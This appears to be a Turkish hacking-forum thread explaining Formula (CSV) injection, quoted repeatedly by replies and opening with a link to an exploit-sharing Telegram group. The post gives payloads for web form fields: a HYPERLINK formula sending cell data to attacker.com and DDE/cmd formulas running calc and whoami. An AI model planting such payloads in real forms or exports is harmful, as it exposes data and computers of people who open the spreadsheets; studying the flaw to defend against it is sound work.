exploit paylaşım grubumuz: t.me/HTTPwnn

Formula CSV Injection Nedir ? 📗 // MİMİKATZ

  • Konu başlatıcı Konu başlatıcı mimikatz
  • Başlangıç Tarihi Başlangıç Tarihi

mimikatz

Mimikatzz
Katılım
4 Tem 2026
Mesaj
54
Reaksiyon
39
Puan
18
Konum
Warnight
Website
www.warnight.pw
xentr_thread_starter
Selamlarr ben Mimikatz. Bugün sizlere çok bilinmeyen ama gayet tehlikeli ve fav açıklardan birisi olan "Formula CSV İnjection" açığından bahsedeceğim.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.
1783174748134.png
Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------

DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.
1783174886604.png
Örnek bir lab var.
1783174953204.png
Basit bir payload yazdık.
1783174965297.png
Açalım.
1783174995549.png
Ve açıldı.

Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.
1783175121598.png

Okuduğunuz için Teşekkürler.
 
Selamlarr ben Mimikatz. Bugün sizlere çok bilinmeyen ama gayet tehlikeli ve fav açıklardan birisi olan "Formula CSV İnjection" açığından bahsedeceğim.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.
Ek dosyayı görüntüle: 358
Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------

DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.
Ek dosyayı görüntüle: 359
Örnek bir lab var.
Ek dosyayı görüntüle: 361
Basit bir payload yazdık.
Ek dosyayı görüntüle: 362
Açalım.
Ek dosyayı görüntüle: 363
Ve açıldı.

Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.
Ek dosyayı görüntüle: 364

Okuduğunuz için Teşekkürler.
hihi
 
Selamlarr ben Mimikatz. Bugün sizlere çok bilinmeyen ama gayet tehlikeli ve fav açıklardan birisi olan "Formula CSV İnjection" açığından bahsedeceğim.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.
Ek dosyayı görüntüle: 358
Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------

DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.
Ek dosyayı görüntüle: 359
Örnek bir lab var.
Ek dosyayı görüntüle: 361
Basit bir payload yazdık.
Ek dosyayı görüntüle: 362
Açalım.
Ek dosyayı görüntüle: 363
Ve açıldı.

Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.
Ek dosyayı görüntüle: 364

Okuduğunuz için Teşekkürler.
e.s
 
Selamlarr ben Mimikatz. Bugün sizlere çok bilinmeyen ama gayet tehlikeli ve fav açıklardan birisi olan "Formula CSV İnjection" açığından bahsedeceğim.
İlk önce excel dosyalarını anlayalım. Excel dosyalarında makrolar & komutlar vardır. Örnek.
=SUM(1 + 1) 2 çıktısını çıkarıcaktır.
Ek dosyayı görüntüle: 358
Şimdi gelelim açığımıza.
En basit tanımı ile Saldırganın excel dosyalarına müdahele etmesini sağlatan bir açıktır Bir şikayet formunda genellikle veriler excel dosyasına kaydedilir. eğer siz Ad girişine =SUM(1 + 1) yazarsanız formu okuyan kişide 2 olarak görünücektir kısaca excelde olan tüm komutları "=" gibi basit bir stringsle aktifleştirebilirsiniz
Tamam mimikatz ama ne yapacağız adama 1 ile 1 mi toplatıcağız? ?
Hayır.
Web sitesine tıklattırıp sutun verileri çalınabilir=HYPERLINK("http://attacker.com/?data="&A1, "Tıkla bana") Komut CalıstırılabilirDDE("cmd";"/C calc";"!A0")=cmd|'/c whoami'!A1
Bunun gibi bir çok şey yapılabilir
-----------------------------------------------------------------------------------------------------------------------------------

DDE & CMD GİBİ KOMUTLAR İÇİN EXCEL & LİBREOFFİCEDE MAKROLAR SEÇENEĞİN AÇILMASI GEREKMEKTEDİR.)
-----------------------------------------------------------------------------------------------------------------------------------
Şimdi gelelim lab anlatımına.
Ek dosyayı görüntüle: 359
Örnek bir lab var.
Ek dosyayı görüntüle: 361
Basit bir payload yazdık.
Ek dosyayı görüntüle: 362
Açalım.
Ek dosyayı görüntüle: 363
Ve açıldı.

Zaafiyet anlatımını kısa tuttum. Nedeni eski birazcık çoğu yerde çıkmayabilir ama genel olarak excel olarak kaydeten yerlerde %70 çıkıyor. Komutlar içinde şöyle bir video bırakalım.
Ek dosyayı görüntüle: 364

Okuduğunuz için Teşekkürler.
Cok guzel hic de duymadim exel e kayit ediyor mu nasil anlariz wappalyzer?
 
Geri
En Üst